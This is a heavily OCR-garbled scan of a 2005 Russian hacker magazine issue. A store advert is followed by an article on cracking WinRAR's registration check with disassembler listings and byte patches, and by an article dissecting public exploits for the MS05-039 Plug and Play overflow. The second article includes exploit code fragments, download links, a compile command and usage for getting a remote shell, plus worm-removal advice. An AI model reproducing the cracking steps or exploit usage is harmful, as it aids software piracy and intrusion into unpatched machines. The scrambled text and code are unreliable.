САЛОНЫ-МАГАЗИНЫ: СЕРВИС-ЦЕНТР: 

ст.м.'Ъабушкинская", ул. Сухонская, 7А (095)105-6447 ст.м.'Ъабушкинская", ул. Молодцова, 1 (095)105-6447 

ст.м."Улица 1905 года", ул. Мантулинская, 2 . . .(095)105-6445 ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м."Владыкино", Алтуфьевское ш., 16 (095)105-6442 ст.м."Владыкино", Алтуфьевское ш., 16 (095)105-6441 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте МѴМѴ ѴѴ.^СбІІІбѴіГІІ 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗІер, Ііапіит, Репііит и Репііит III Хеоп являются товарными знаками или заре- 
гистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 








Новое Фото-Интернет кафе уже открыто! На базе компьютеров Н-ЕХТКОІЧ. 

Фото 10x15=5 руб., чашка кофе=35 руб., Интернет=30 руб. 






ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




Пластырь для ѴѴіпВАВ 

ВСЕ МЫ ЗНАЕМ О ВЕЛИКОМ ТВОРЕНИИ ЕВГЕНИЯ РО- 
ШАЛЯ, КОТОРОЕ МОЖЕТ ЗАПАКОВАТЬ И РАСПАКО- 
ВАТЬ ВСЕ И ВСЯ. НО ВОТ НЕЗАДАЧА — ЗА ТО, ЧТОБЫ 
АРХИВАТОР РАБОТАЛ КАК СЛЕДУЕТ И НЕ НАДОЕДАЛ 
ГНУСНЫМИ ОКОШКАМИ С ПРОСЬБАМИ ЗАПЛАТИТЬ 
ДЕНЕГ, НЕОБХОДИМО ЭТИХ САМЫХ ДЕНЕГ ОТВА- 
ЛИТЬ. НЕ ЗНАЮ КАК ТЕБЕ, НО МНЕ МОЕЙ СТИПЕН- 
ДИИ ДЛЯ ЭТОГО ЯВНО НЕ ДОСТАТОЧНО, И ПОЭТОМУ 
Я РЕШИЛ СХАЛЯВИТЬ, А ЗАОДНО И ПОТРЕНИРОВАТЬ 
СВОИ МОЗГИ. ОКАЗАЛОСЬ, ЧТО КРЭКНУТЬ ѴѴІІМПАП 
— ПРОЩЕ ПРОСТОГО! СЕЙЧАС РАССКАЖУ, КАК Я 

ЭТО СДЕЛАЛ I Максим Федотов ака Ы1п (Ы1п@таіІ.ги) 



Взлом популярного архиватора — 
это очень легко! 

[зачем платить?] В самом деле, так ли уж нужно регистрировать ѴѴіпВаг, 
чем же он так надоедает? На самом деле, программа довольно либерально 
работает: даже на истекшем триале она не лишается функциональности. 
Однако каждый раз в течение 30 дней при запуске винрара появляется над- 
пись о том, что ты не удосужился заплатить денежку. От этого, однако, раз- 
вивается недюжинный комплекс неполноценности, который бьет по моей 
шаткой психике как молот по наковальне, ведь если я не заплачу денег, 
после 40 дней использования программы, софтина начнет доставать меня 
нагами — окошками с мольбами о регистрации! В общем, отвратительно 
себя ведет эта программа. Поэтому я и расскажу грустную историю ее 
взлома. Конечно, в чисто образовательных целях. 

[что нам понадобится] Для плодотворной воспитательной работы нам 
потребуется дизассемблер ѵѵ32сІазт, патчер Собеіизіоп, отладчик оІІусІЬд, 
шестнадцатеричный редактор, вроде Пеіѵѵ, и какой-нибудь пристойный ре- 
дактор ресурсов (скажем, гезГіаскег или реісі). Сейчас я расскажу, каким об- 
разом мне удалось поломать ѴѴіпВаг, и опишу логику своих рассуждений. 

[Іеі'з до] Первым делом я запустил реісі и открыл ехе'шник ѵѵіпгаг. Ока- 
залось, что программа ничем не запакована и вдобавок написана на 
С — идеальный вариант для меня. Свои опыты я решил начать с того, 
чтобы избавиться от нагов и убирать надпись «Незарегистрированная 
версия». Для этого я запустил ОІІу и открыл в нем ѴѴіпВаг. Затем я уста- 
новил брэк (Ьгеакроіпі) на функцию, вызывающую наг: 



\ I / 




/ I \ 



Твой любимый журнал не устает напоминать своим любимым чита- 
телям, что за свои любимые дела можно попасть в нелюбимые нами 
места. Осторожнее там с местными обитателями :(. А лучше всего — 
не делай ерунды и не нарушай законов своей страны. 




Шр://сгаск!аЬ.ги/ботІоаб/де\.р\ір?д=72 — оІІубЬд 
йіір://сгаскІаб.ги/ботІоаб/деі.рйр?д=5 — Шеш 
Шр://сгаскІаЬ.ги/ботІоаб/де\.рйр?д=23 — гевіогаіог 
йНр://\л/\л/\л/.сйеаі5тахітаІ.пеІ/с1отІоаб/іооІ5/раісй/собеІ530.іір — собеіизіоп 





йі А1_ОѲ ВОХРАПАМ — ВЫДЕРЖКА ИЗ СПРАВОЧНИКА 

Іипсііоп ОіаІодВохРагат(Іп$Іапсе, ТНапсІІе; ТетрІаІеМате: РСИаг; Рагепі: 
НѴѴпф ОіаІодРипс: ТРагРгос; ІпіІРагат: І_опдіпІ): Іпіедег. 

Создает блок модального диалога, определенного 
ТетрІаІеІМате, и перед тем, как отображать диалог, посыла- 
ет сообщение ѵѵпп_ІпіЮіаІод. Также позволяет передавать 
начальный параметр функции обратного вызова. 

Есть следующие аргументы: 

•Іпзіапсе. Экземпляр модуля, исполнимый файл которого 
содержит шаблон блока диалога. 

• ТетрІаіе№те. Имя шаблона блока диалога (заканчивающе- 
еся пустым символом). 

•Рагепі. Окно владельца. 

•ОіаІодРипс. Адрес экземпляра процедуры функции диалога. 
•ІпііРагат. Передается в параметре ІРагат сообщения 
ѵѵт_ІпіЮіаІод. 

Функция возвращает параметр пВезиК процедуры 
ЕпсЮіаІод и -1 в случае, если диалог не может быть 
создан. Функция находится в файле изег32.сІІІ 








Врх ОіаІодВохРагатА 



Здесь ОіаІодВохРагатА — это имя функции, показывающей окошко 
с просьбой о регистрации. Теперь нужно запустить программу и ожидать, 
что ее выполнение прервется как раз при вызове контролируемой функции. 
Давим на епіег, жмем 19 и все получается в точности так, как мы планирова- 
ли, на адресе 00440Ше мы вваливаемся в ОІІу и видим там такой код: 



[код, вызывающий процедуру показа нага] 



00440Р56 .6А00 
00440Р58 .68 Р44Р4400 
00440Р50 .РР35 1С164В00 
00440Р63 .68 Е1 5Р4900 
00440Р68 .РР35 Е0Р94900 
00440Р6Е .Е8 67Р30400 



РІІЗН 0; /ІРагат = І\ІШ_І_ 

РІІЗН ѴѴі ПРАВ. 00444 РР4 
РИЗН ЭМОЕЮ РТВ 03: [4В1 61 С] 

РОЗН ѴѴІПВАВ.00495РЕ1 
РОЗН ОѴѴОРЮ РТВ 03: [49Р9Е0] 

САН <ЗМР.&ІІЗЕВ32.0іаІодВохРагатА> 



Я нажал Р8, чтобы перейти на строчку дальше, и увидел, что появился 
наг. То, что надо. Записав адрес, я вышел из ОІІу и направился к Ніеѵѵ. 
Выбрав тобе-сіесосіе и нажав доіо, я ввел полученный адрес с точкой 
вначале и заменил там 5 байт, записав в них 90, то есть просто занопил 
их, после чего сохранил файл и вышел из Ніеѵѵ. Теперь настало время 
попробовать запустить архиватор. Кликнув два раза по знакомому яр- 
лычку, я обнаружил, что успевшие уже надоесть наги пропали, однако 
осталась надпись наверху, которая портит весь эффект. Я решил поте- 
реть ее, просто изменив заголовок в редакторе ресурсов. Для этого отк- 
рыл в гезГіаскег'е ѵѵіпгаг, нашел строчку «незарегистрированная копия» 
и изменил ее на кое-что более приятное. Вот и все, приятель, так я по- 
ломал ѴѴіпВаг. Правда, элементарно? Простейший пример, простейший 
крэк. Ну и скажи мне теперь, что ты не справишься с чем-то подобным. 
Однако я еще не закончил свой рассказ. Сам понимаешь, что делать 
всю эту фигню руками не очень-то клево. Поэтому у меня возникло ре- 
зонное желание изготовить полноценный патч для удобства. 



[ваяем патч] Я воспользовался крутым (для меня:)) патчером собеіи- 
зіоп. Этот патчер работает довольно просто. Ему передается два файла: 
оригинальный и пропатченный. Он вычисляет разницу между ними и ав- 
томатически генерирует код патча. Использовать сосіеіизіоп проще прос- 
того. Выбираем заголовок и текст в окне патча, жмем пехі, после этого 
выбираем файл для патча, а в окне баіа Іо раІсИ жмем правую кнопку мы- 
ши и выбираем Іііе сотраге. Здесь указываем оригинальный и поломан- 
ный файлы, патчер их побайтово сравнивает, после чего автоматически 
генерирует ехе-патч, который можно релизить на крэкерских форумах :). 



[второй способ] Понравилось? Сейчас понравится еще больше. 
Я опишу еще 2 способа, как крэкнуть этот несчастный архиватор. 

Как ты, наверное, уже успел заметить, наг появляется только после 40 
дней. А что же тогда происходит до этого? Не знаешь? Да ладно тебе, 
все ты знаешь. Происходит отсчет времени. Десятичное число 40 
в шестнадцатеричном представлении — это 28, значит, где-то в прог- 
рамме что-то сравнивается с 28Гі. Чтобы понять, где именно и что срав- 
нивается, мы воспользуемся ѵѵ32сІа5т. 




Сравнение осуществляется оператором стр, поэтому жмем в дизасме 
зеагсГі=ЯіпсІ Іехі и набираем там деІІосаШте, так как именно эта функ- 
ция отвечает за нахождение времени на компе, следовательно, после 
нее идет расчет оставшихся дней. Поэтому после того, как мы отыскали 
вызов этой функции, следует просмотреть код в поисках числа 
00000028. И в самом деле, несложно заметить следующий код: 



00440Р46 . 83Р8 28 
00440Р49 . 7Р 04 
00440Р4В .8500 
00440Р4Э .70 24 



СМР ЕАХ,28 

ЭСІ ЗНОВТ ѴѴІПВАВ.00440Р4Р 
ТЕ8Т ЕАХ,ЕАХ 

ЭѲЕ ЗНОВТ ѴѴІПВАВ.00440Р73 



Здесь число из регистра еах сравнивается с 28Гі (это те самые 40 дней). 
Если содержимое ЕАХ больше или равно 28, происходит скачек на 
00440Р4Р, если же нет, то осуществляется сравнение с 0 и прыжок по 
Іде, пролетая мимо процедуры, вызывающей наг. 

Для того чтобы ѴѴіпВаг перепрыгнул эту процедуру, надо чтобы еах был 
меньше 28П, поэтому я просто обнулил его строкой хог еах, еах и зано- 
пил последующие 3 байта в Ніеѵѵ, нажав е<Л=>азт. 

Все. Нагов нет, а как быть со строкой в названии окна? Можно, ко- 
нечно, опять исправить ее редактором ресурсов, но мы для разнооб- 
разия поступим по-другому. Наберем часть этой строки в поиске ди- 
засма и исправим ее руками. Правда, все русские буквы винрара 
выглядят, как крякозябры, но зато мы знаем, что в названии есть 
слово из латинских букв: ѴѴіпВАВ. Если поискать его, можно найти 
следующий код: 



0044В353 I. 68 Е06В4900 
0044В358 I. 8Э4424 08 
0044В35С I. 50 
0044В35Э I. Е8 02Е00300 
0044В362 I. 8304 ОС 
0044В365 I. 8030 ВСР94900 > 
0044В36С I. 75 7А 
0044В36Е I. А1 С8434В00 
0044В373 I. 83Р8 14 
0044В376 I. 7С 05 
0044В378 I. 83Р8 28 
0044В37В І.7СЮ 



РІІЗН ѴѴІПВАВ.00496ВЕО 

І_ЕА ЕАХ,ОѴѴОВО РТВ 53:[ЕЗР+8] ; I 

РІІЗН ЕАХ ; ІАгдІ 

САН ѴѴіпВАВ.00489364 

АОО ЕЗР,0С 

СМР ВѴТЕ РТВ ОЗ:[49Р9ВС],0 
ЦЫ2 ЗНОВТ ѴѴІПВАВ.0044ВЗЕ8 
МОѴ ЕАХ,ОѴѴОВО РТВ 03:[4В43С8] 
СМР ЕАХ, 14 сравнение с 14Н(20сІес) 
Л ЗНОВТ ѴѴІПВАВ.0044В370 
СМР ЕАХ, 28 сравнение с 28Н(40сІес) 
Л ЗНОВТ ѴѴІПВАВ.0044В39А 



Теперь если хорошенько вспомнить работу ѴѴіпВаг, то окажется, что пос- 
ле 20 дней юзанья в заголовок вставляется уже другой текст. Итак, смот- 
рим на код. В первом случае еах сравнивается с 20, во втором — 
с 40, отсылая тебя на определенные адреса, где функция воспроизводит 
разные заголовки. Так что мы поступим так же, как и в предыдущем слу- 
чае: обнулим еах и занопим последующие байты. Теперь в заголовке не 
будет никаких надоедающих надписей, и ты сможешь почувствовать себя 
настоящим крэкером. 

[заключение] Ну вот, собственно, и все. Сегодня вы узнали, как 
двумя разными способами сломать незаменимую для виндового 
юзера софтину. Хэв э найс дэй, приятель, не попадайся ѳ 





ѵѵ32сІа5т — очень полезная вещь, особенно для борьбы с несложными 
защитами 



наши труды не прошли даром 



[ХАКЕР 10 [82] 05 > ВЗЛОМ 063 ] 









ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 




Подключим — поиграем! 



ТЫ, КОНЕЧНО ЖЕ, ЗНАЕШЬ, ЧТО ТАКОЕ РШО АЫЭ РІ_АѴ. А ЕСЛИ И НЕ ЗНАЕШЬ, ТО ЭТО НЕ МЕШАЕТ ТЕБЕ 
ПОЛЬЗОВАТЬСЯ ЭТОЙ ТЕХНОЛОГИЕЙ ИЗО ДНЯ В ДЕНЬ, ПОДКЛЮЧАЯ НОВЫЕ ДЕВАЙСЫ, МРЗ-ПЛЕЕРЫ, ЦИ- 
ФРОВИКИ, ІІЗВ-ФЛЕШКИ И ПРОЧИЕ ЭЛЕКТРОННЫЕ ЖЕЛЕЗКИ. ЭТА ЗАМЕЧАТЕЛЬНАЯ ТЕХНОЛОГИЯ СЕРЬЕЗ- 
НО УПРОЩАЕТ ЖИЗНЬ МИЛЛИОНАМ ЮЗЕРОВ, СВОДЯ УСИЛИЯ, НЕОБХОДИМЫЕ ДЛЯ УСТАНОВКИ И НА- 
СТРОЙКИ НОВЫХ УСТРОЙСТВ К МИНИМУМУ. НО НЕДАВНО ЭТА ЖЕ ТЕХНОЛОГИЯ ПОСЛУЖИЛА ПРИЧИНОЙ 
ДЛЯ ВОЗНИКНОВЕНИЯ СЕРЬЕЗНОЙ ВИРУСНОЙ ЭПИДЕМИИ, ПОРАЗИВШЕЙ СИСТЕМЫ ТАКИХ КОМПАНИЙ, КАК 
МІСВОЗОРТ, СЫЫ И ИЕѴѴ ѴОВК ТІМЕЗ. ПРИШЛО ВРЕМЯ РАЗОБРАТЬСЯ, ПОЧЕМУ ТАК ПРОИЗОШЛО, ГДЕ КОСЯК 
В Р'ІМ'Р, КАК ЭТО МОЖНО ИСПОЛЬЗОВАТЬ И ЧЕГО СЛЕДУЕТ БОЯТЬСЯ I Хаштамов Адиль (асііі @ок.кг) 



Описание бага и создание сплоита 
для сервиса РІид'п'РІау 

[доигрались] РІид апсі РІау — это стандартный сервис системы ѴѴіп- 
сіоѵѵз Г\ІТ, который устанавливается по умолчанию. Предназначен этот 
сервис для облегчения жизни стандартного виндового пользователя: с 
его помощью операционная система обнаруживает новые девайсы и по- 
могает юзеру установить необходимые драйвера и софт. Этот детский 
минимализм длился вплоть до 9 августа 2005 года, когда на сайте кор- 
порации МісгозоК был опубликован бюллетень, описывающий критиче- 
скую брешь в сервисе РІид'п'РІау. В сообщении было указано, что уязви- 
мыми считаются все версии систем ѴѴіпсІоѵѵз ІЧТ, в которых установлен 
этот сервис. Как выяснилось позже, атаковать Р'п'Р можно было и уда- 
ленно. Это могло означать только одно: в Сети грядет новая волна эпи- 
демий. Впрочем, далее по тексту было замечено, что критической дан- 
ная уязвимость считается только для систем семейства 2к. Конечно же, 
во всеми любимой ХР брешь тоже существует, но, как оценили исследо- 
ватели, для данной системы она не является критической, поскольку 
для эксплуатации ошибки нужно иметь какие-то локальные права на 
удаленной машине, а для ѵѵіп2к иметь права не требуется, в результате 
чего анонимный пользователь может легко поднять свои привилегии на 
атакуемой машине. 

[уязвимость] Сама по себе уязвимость очень проста. Это стековое 
переполнение буфера. В отведенный буфер сервис Р'п'Р копирует вхо- 
дящие сообщения, не проверяя и не ограничивая их длину. Поэтому спе- 
циальным образом сформированное сообщение может вызвать пере- 
полнение буфера, что повлечет за собой сбой зегѵісе.ехе, или выполне- 
ние зловредного кода на стороне атакуемой машины. Сервис Р'п'Р по- 
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строен на ОСЕ ВРС протоколе и 
доступен через 445Лср порт. На 
всякий случай напомню, что ВРС, 

Ветоіе Ргосебиге СаІІ (удаленный 
вызов процедур), представляет из 
себя механизм, при помощи кото- 
рого любое приложение может 
вызывать процедуры на удален- 
ной машине. Думаю, у абсолютно- 
го большинства читателей аббре- 
виатура ВРС неразрывно связана 
с ВРС ЭСОМ-багом, который по- 
портил им немало крови. Но се- 
годня мы говорим не об этом баге, 
на повестке дня — дырка в 
РІид'п'РІау, так что не будем от- 
влекаться. 

Удаленный доступ к сервису Р'п'Р 
осуществляется с использованием 
так называемых «именованных 
каналов» через ІМІІШ-сессию, то 

есть по протоколу ЗМВ без аутентификации. Именованные каналы в 
ѴѴіпсІоѵѵз — это один из способов для межпроцессного взаимодействия. 
Доступ к ним может осуществляться как локально, так и удаленно, при 
помощи протокола ЗМВ. Ты, конечно же, помнишь о странном общем 
ресурсе с названием ІРС$, который немало мозолил тебе глаза. Нелиш- 
ним будет пояснить, что ІРС расшифровывается, как Іпіег-Ргосезз Сот- 
типісаііоп и именно этот ресурс содержит в себе именованные каналы. 
Поэтому для того, чтобы удачно проэксплуатировать уязвимость в сер- 
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В Сети я нашел достаточно 
хорошую статью, описы- 
вающую все сервисы ОС 
ѴѴіпсІоѵѵз. Жалко то, что 
статья на английском. Но я 
думаю, что ты уже преодо- 
лел языковой барьер. 
Статью ты можешь наблю- 
дать на нашем СО. 

На нашем диске для озна- 
комления ты найдешь ис- 
ходные коды упомянутых 
эксплойтов, а также книгу 
по сервисам ѴѴіпсІоѵѵз. 

Червь ІоІоЬ, наделавший 
столько шума, базируется 
на известных публичных 
ботах типа ЗбЬоі и НЬоі. 






Помни: эта статья дается 
тебе для создания адекват- 
ной защиты от сетевых 
взломщиков. Любое неза- 
конное использование этой 
информации лежит на тво- 
ей совести и будет бить по 
заднице именно тебя. 

Сплоит от Йо б' а: шш.зеси- 

гіІуіпІо.ги/шшш/ирІоаб/НОО- 

тзОбОЗЭ-рпр-ехрІ.с 

Сплоит от зІОрру: шшш.бег- 

кеіІег.сот/МаіІіпд-изіз/Се- 

сигііеат/2005-08/0054.ІіітІ 



• ' “ помни: эта статья дается висе РІид апсі РІау достаточно 

) тебе для создания адекват- создать соединение по І\ІІІЦ_-сес- 

ной защиты от сетевых сии, после чего появится возмож- 
ность вызывать ВРС процедуры 
на удаленной системе. Когда сое- 
динение будет установлено, нуж- 
но соединиться с ІРС$ и открыть 
именованный канал. ІРС$ исполь- 
зуется для того, чтобы сконфигу- 
рировать список именованных ка- 
налов. Для анонимного доступа 
используется канал \ріре\Ьгоѵѵзег. 
После всего этого нужно забин- 
дить ОСЕ ВРС интерфейс, для че- 
го используются функции ІІиісГ и 
вызовы для работы с сетью. 

Затем указывается Оеѵісе Ю — в данном случае нам требуется РІид апсі 
РІау ЗоЛѵѵаге Оеѵісе Епитегаіог, поэтому указывается НООТ\8У- 
8ТЕМЮ000. Хочу предупредить что данный сервис использует обработ- 
ку исключительных ситуаций (ЗЕН), поэтому для удачного эксплуатиро- 
вания нужно будет обойти эту за- 
щиту. О том, как это реализовать, 
тебе лучше почитать в Спеце по 
переполнениям. А мы пока попро- 
буем свои силы на практике и 
присмотримся к первому выпущен- 
ному эксплойту, который появился 
через два дня после публикации 
информации о баге. Автор этого 
эксплойта, перец с ником зІОрру, 
реализовал в своем творении все, 
о чем я говорил выше, и получил 
вполне боеспособную отмычку. Его 
творение ты можешь наблюдать на 
нашем ОѴО-диске. В тексте эк- 
сплойта очень легко разобраться, в 
чем ты скоро убедишься. 



[эксплойт в разрезе] Сейчас я 
рассмотрю на пальцах, как работа- 
ет сплоит от зІОрру. В начале про- 
граммы расположена структура 
ВРС, описание которой ты можешь 



сервис РІид апсі РІау 



прослушивание пакетов 



найти в статье о сервисах, которая лежит на нашем диске. Поэтому я не 
буду заострять внимание на такой ерунде, лучше перейду сразу к основ- 
ным функциям, а именно к ВіпсІВрсІпІегІасе. В данной функции происходит 
бинд ВРС интерфейса; я приведу ее код и расскажу, как она работает. 

[код функции ВіпсШрсІпІегІасе] 

іпі ВіпсШрсІпІеі1асе(НАШІ_Е РН, сііаг *1п1ег!асе, сііаг *ІпІег!асеѴег) 

{ 

тетсру(&ВРСВіпф&РВРС,зі 2 еоІ(ВРСВіпсІ)); 
ІІиісІРготЗІгіпд(ІпІегІасе,&ВРСВіпсі.ІпІегІасеІІІІЮ); 
ІІиісІТоЗІгіпд(&ВРСВіпс].ІпІегІасеІЛЛО,&ІпІегІасе); 
ВРОВіпсі.ІпІегІасеѴегМаі=аІоі(&ІпІегІасеѴег[0]); 
ВРСВіпсі.ІпІегІасеѴегМіп=аІоі(&ІпІегІасеѴег[2]); 
ТгапзасШатес]Ріре(РН, &ВРСВіпсІ, 5І2еоТ(ВРСВіпсІ), гЬиІ, 
зігеоТ(гЬиТ), &с№, І\ІІЛ_І_); 
геіигп 0; 

} 

Функция ІІиісІРготЗігіпд преобразует строку в ІІиісІ формат, который ис- 
пользуется для взаимосвязи посредством сервисных интерфейсов, а 
ІІиісІТоЗігіпд, как несложно догадаться, выполняет обратную операцию. 
После того, как заполняются поля ІпІегІасеѴегМаі и ІпІегІасеѴегМіп 
структуры ВРСВІІ\Ю, происходит вызов функции ТгапзасІЫатесІРіре(РН, 
&ВРСВІПСІ, зігеоІ(ВРСВіпсІ), гЬиТ, зігеоІ(гЬиІ), &сіѵѵ, Ши_), которая запи- 
сывает и читает данные из именованного канала. Несложно видеть, что 
у этой функции имеется 7 параметров: 

И Хэндл на именованный канал, созданный с помощью СгеаІеІМатесІРі- 
ре или СгеаІеРіІе 

\2\ Указатель на структуру данных, которые запишутся в канал 
0 Размер 2 параметра 

Щ Указатель на буфер, принимающий ответ от канала 
0 Размер 4 параметра 

0 Указатель на переменную, которая принимает количество байт, про- 
читанных из канала 

0 Указатель на ОѴЕВІ_АРРЕО структуру. В данном случае он игнорируется 
В главной функции таіп() расположена структура ЫЕТВЕЗОІІВСЕ: 
МЕТВЕЗОІІВСЕ пг; 

пг.сІѵѵТуре = ВЕ301ІВСЕТѴРЕ_АІ\ІѴ; #это тип ресурса 

пг.ІрЕосаІЫате = І\ІІІЦ_; #локальное имя машины 
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СПЛОИТ ОТ НОІІЗЕОРРАВІІЗ 

Спустя один день после публикации зІОрру, на свет по- 
явился эксплойт от уже ставшего знаменитым эксплойтера 
Ііоизео^сІаЬиз'а. Его реализация, как мне кажется, базиро- 
валась на первом эксплойте, он просто внес туда некото- 
рые изменения. НоЭ добавил в свой эксплойт возмож- 
ность исполнять код, плюс разместил сам шелл-код в се- 
редине между ІЧОР'ами. Это было сделано для того, чтобы 
при неудачном эксплуатировании сервис не падал и тем 
самым не перезагружал удаленную машину. Также данный 
эксплойт являлся универсальным засчет того, что во всех 
системах ѴѴіпсІоѵѵз 2000 адрес рор еах, рор еах, геі (эти ин- 
струкции используются для борьбы с ЗЕН) был одинако- 
вым в уязвимой библиотеке итрпртдг.сІІІ, которую юзает 
бажный Р'п'Р. Особенно следует отметить тот факт, что ни 
один из выпущенных сплоитов не предназначается для си- 
стем ѴѴіпсІоѵѵз ХР, поскольку в них не реализована функ- 
ция авторизации на удаленном хосте. Впрочем, приделать 
такую возможность не составляет большого труда. 



пг.ІрВетоІеІМате = ипс; /удаленное имя машины 

пг.ІрРгоѵісІег = І\ІШ_І_; /провайдер 

Несколько лет назад Ноггіііс писал статью, в которой описывался при- 
мер создания сканера ресурсов. Так вот, в нашем случае используются 
функции и структуры аналогичные тем, что были разобраны в его 
статье. Далее в сплоите создается соединение с хостом, указанным в 
первом аргументе функции таіп(): 

зегѵег=агдѵ[1 ]; 

_5пргіп{|(ипс, 5І2еоТ(ипс), "\\\\%з\\ріре", зегѵег); 
ѴѴІ\ІеІАсісіСоппесІіоп2(&пг, 0); 

Процедура ѴѴІ\ІеІАсІсІСоппесІіоп2() соединяет машину с сетевым ресур- 
сом, у этого блока кода имеется 4 аргумента: 

Щ Указатель на структуру ІЧЕТВЕ501ІВСЕ 
\ 2 \ Пароль 

[з] Имя пользователя 
Щ Флаг 

Флагов очень много, я рассмотрю лишь некоторые: 

- С0ШЕСТ_ІІ\ІТЕВАСТІѴЕ — если этот флаг установлен, то ОС взаи- 
модействует с пользователем через аутентификацию 

- С0ШЕСТ_РВ0МРТ — в данном случае ОС делает все по умолча- 
нию. То есть никакая аутентификация не требуется 

Теперь расскажу о том, каким образом можно создать анонимный име- 
нованный канал. Реализуется это следующим образом: 

_5пргіпЙ(з2Ріре, 8 І 2 еоІ(з 2 Ріре), "\\\\%з\\рі ре\\Ьгоѵѵзег " , зегѵег); 

ГіРіІе = СгеаіеРіІе(з 2 Ріре, ОЕМЕВІС_ВЕАОІОЕЫЕВІС_ѴѴВІТЕ, 0, ШІ_І_, 
ОРЕІ^ЕХІЗТІЫО, 0, ШЩ; 

ВіпсІВрсІпІегІасе(ГіРіІе, І, 8сІ9І4е40-а03сІ-1 1 се-8Ш9-08003е30051 Ь","1 .0"); 

[эпидемия птичьего гриппа] Буквально на второй день после публи- 
кации информации об уязвимости Р'п'Р, в Сети появился злобный червь, 
который поражал непропатченные системы. Оказалось, что по всему миру 
бесчисленное множество бажных машин. Новому червю дали звучное имя 

- 2оЮЬ. Процедура размножения этого червя чрезвычайно банальна: он 
просто сканирует огромные сетевые диапазоны в поисках уязвимых машин 
и заражает найденные машинки. Червь также умеет получать команды по 
ігс: хозяин ігс-сервера указывает команду ботам, а те охотно выполняют ее. 
Сразу же, как новость о новом черве просочилась в массы, стали появлять- 
ся клоны червя. Ими уже, скорее всего, управляли другие люди. Клоны на- 
чинали проверять признаки раннего заражения на удаленной машине, и 
если признаки выявлялись, они старались удалять старые варианты чер- 
вей. И тут уже разразилась настоящая бойня за каждую отдельную маши- 
ну. Заражению подверглись десятки тысяч компьютеров! В их числе были 
машины таких крупнейших корпораций, как МісгозоТС, СІЧЫ и І\ІѴ Тітез. 

[защита от заразы] Как говорится, нужно знать своего врага в лицо. По- 
этому я хочу описать подробности обнаружения этой заразы и последую- 





структура ВРСВІЫО 
и шелл-код сплоита от зІОрру 



Во-первых, что меня удивило, так 
это тот факт, что 2оЮЬ практически 
никак не маскируется. Никак не 
скрывает ключей в реестре, не перехватывает АРІ-вызовы. Его обнаружить 
очень легко. Первое, что бросается в глаза, так это запись в реестре на ав- 
тозагрузку червя. Обычно в реестре он пишется в такие стандартные клю- 
чи, как НКЕУ_ЮСАІ_МАСНІЫЕ\ЗОРТѴѴАПЕ\Місго5отѵѴіпсІоѵѵ5\СиггетѴег- 
зіоп\Вип и НКЕУ_ЮСАІ_МАСНІЫЕ\ЗОРТѴѴАВЕ\МісгозоП\ѴѴіпсІоѵѵ5\Сиггеп- 
ІѴегзіоп\ВипЗегѵісез. Обязательно обрати внимание на значения ключей, 
которые находятся там. Червь обычно маскируется под названиями 
сзт.ехе и Ьоігог.ехе. Бинарный микроб открывает свой ТСр-сервер на 33333 
порту и удаленный шелл на 8888 порту. Зараза также соединяется с ІВС- 
сервером. Еще червь блокирует стандартный виндовый файрвол путем мо- 
дификации реестра и запрещает доступ к сайтам, модифицируя Гюзіз-файл 
в директории ѴѴіпсІоѵѵз. Я думаю, ты уже догадался, как удалить эту тварь. 
Во-первых, нужно убить процесс червя. Для этого нужно использовать не 
стандартный «Диспетчер задач», а утилиту, которая убивает процессы в ре- 
жиме Зузіет ОеЬид. За примером такой тулзы далеко ходить не надо, возь- 
мем, к примеру, утилиту, написанную моим хорошим знакомым, которая 
называется Ргосезз Нипіег. После того, как ты кильнул заразный процесс, 
нужно отыскать поганый бинарник и снести его. 

Если же ты все еще не подцепил заразу, то лучшим способом будет зак- 
рыть файрволом от внешних адресов 135 и 445 порты. Данный метод 
универсален и он спасет тебя от всех последующих атак, которые реа- 
лизуются через эти Іср-порты. Также полезным будет установить патч 
от МісгозоК, который лежит на нашем диске 0 



ИСПОЛЬЗОВАНИЕ СПЛОИТА НОО 

Расскажу о том, как пользоваться этим сплоитом. Прежде 
всего, скачать версию сплоита ІіоизеоТсІаЬиз'а можно здесь: 
уѵуѵуѵ. зесигііуіпіо . ги/уѵуѵѵѵ/ирІоаб/НОО-тзОЗОЗЭ-рпр-ехрІ. с , ли- 
бо взять с нашего диска. Собрать ее можно под любой 
платформой, где можно установить компилятор С. Я соби- 
рал этот сплоит под {гееЬзсІ и никаких затруднений возни- 
кнуть не могло: дсс уѵуѵуѵ. зесигііуіпіо . ги/ѵѵѵѵѵѵ/иріоа сІ/НОй- 
тз05039-рпр-ехрІ.с -о зріоіі и все дела. Что касается запуска 
отмычки, то и тут все очень просто: требуется банально ука- 
зать адрес уязвимой машины и порт, на котором требуется 
забиндить стсі.ехе. Все это прекрасно проиллюстрировано 
на скрине, так что вопросов возникнуть не должно. 








ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




Г рязные диггеры ѴРМ 



ѴРМ — ВИРТУАЛЬНЫЕ ЧАСТНЫЕ СЕТИ — ПРОДВИГА- 
ЮТСЯ КАК ИДЕАЛЬНОЕ СРЕДСТВО ДЛЯ ПЕРЕДАЧИ 
КОНФИДЕНЦИАЛЬНЫХ ДАННЫХ ЧЕРЕЗ ИНТЕРНЕТ 
